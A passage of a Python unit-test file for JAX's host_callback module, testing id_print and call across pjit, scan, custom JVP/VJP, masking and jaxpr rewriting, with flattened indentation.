self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_tap_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_tap_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
@partial(jax.named_call, name="fun1") # for xprof debugging
def fun1(x, do_print=False):
z = jnp.dot(x, y)
return maybe_print(do_print, z, "z", tap_with_device=True)
res0 = fun1(x, do_print=False)
pjit_fun1 = pjit.pjit(
partial(fun1, do_print=True),
in_axis_resources=(P("d"),),
out_axis_resources=P("d"))
with maps.mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun1,
x,
num_partitions=nr_devices)
res = pjit_fun1(x)
self.assertAllClose(res0, res)
hcb.barrier_wait("before check")
# Assertion text is for 2 devices (also works for 1 device)
# Note that a single call is made.
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: z
[[ 3 3 3 3]
[33 33 33 33]]""")
  def test_tap_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
@partial(api.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
api.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] )
( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
api.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4]
[0. 0.2 0.4 0.6 0.8] )
( ( False )
( False ) ) ) )""", testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., api.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what=f"x times {i}", output_stream=testing_stream)
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait("first")
expected = """
what: x times 1
[[0. 1. 2.]
[3. 4. 5.]]
what: x times 2
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times 3
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait("second")
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 0,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
api.grad(loss)(1.0) # should not fail
def test_tap_remat(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, api.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_named_call(self):
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(x):
return 2 * x
def fun(x):
y = hcb.call(f_outside, x + 1, result_shape=x)
return 3 * (1 + y)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(3 * (1 + 2 * (arg + 1)), fun(arg))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_{np.dtype(dtype).name}", dtype=dtype)
for dtype in jtu.dtypes.all
if dtype != np.bool_))
def test_call_types(self, dtype=np.float64):
def f_outside(x):
# Use x + x to ensure that the result type is the same
return x + x
def fun(x):
return hcb.call(f_outside, x + x, result_shape=x)
arg = np.arange(24, dtype=dtype).reshape((2, 3, 4))
self.assertAllClose(arg + arg + arg + arg, fun(arg), check_dtypes=True)
def test_call_types_bool(self, dtype=np.float64):
def f_outside(x):
return np.invert(x)
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = np.random.choice(a=[True, False], size=(2, 3, 4))
self.assertAllClose(np.invert(arg), fun(arg))
def test_call_tuples(self):
def f_outside(args):
x, y = args
return y, x # Swap the tuple
def fun(x):
xy = hcb.call(f_outside, (x, x + 1), result_shape=(x, x))
return 2 * xy[0] + 3 * xy[1]
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(2 * (arg + 1) + 3 * arg, fun(arg))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=api.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=api.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(api.ShapeDtypeStruct(result_shape_0, np.float32),
api.ShapeDtypeStruct((1,), np.float32),
api.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(api.ShapeDtypeStruct(result_shape, np.float32),
api.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, api.jit(loop)(1.2))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = api.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=api.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function."""
def fun1(m):
      return jnp.sin(hcb.call(lambda x: np.cos(x),
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun1, m)
def fun2(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun2, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(local_devices()), dtype=jnp.int32)
res = api.pmap(fun)(xv)
self.assertAllClose(api.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
api.vmap(fun)(np.ones((2, 3)))
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_call_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_call_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
def callback_x5_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(5, np.int32)
def fun(x):
xy = jnp.dot(x, y)
return hcb.call(
callback_x5_func, xy, result_shape=xy, call_with_device=True)
pjit_fun = pjit.pjit(
fun, in_axis_resources=(P("d"),), out_axis_resources=P("d"))
with maps.mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun,
x,
num_partitions=nr_devices)
res = pjit_fun(x)
expected_res = jnp.dot(x, y) * np.array(5, np.int32)
self.assertAllClose(expected_res, res, check_dtypes=False)
hcb.barrier_wait("before assertion")
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0
Called with [[ 3 3 3 3]
[33 33 33 33]]""")
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return api.jit(jax_outside_fun)(api.device_put(arg, device))
@api.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=api.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = api.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
if jtu.device_under_test() != "cpu":
assert api.devices("cpu")
self.outside_device = api.devices("cpu")[0]
else:
if len(api.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = api.devices("cpu")[1]
super().setUp()
def test_jax_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), api.jit(f_outside)(3.))
def test_jax_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {api.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_jax_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = api.grad(f_jax)(3.)
self.assertAllClose(res_jax, api.grad(f_outside)(3.))
def test_jax_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = api.grad(f_jax)(x)
self.assertAllClose(res_jax, api.grad(f_outside)(x))
def test_jax_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = api.grad(api.grad(f_jax))(5.)
res_outside = api.grad(api.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
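# Tests for the jaxpr rewrite that threads input/output tokens through computations
# containing outside_call primitives.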
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = api.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
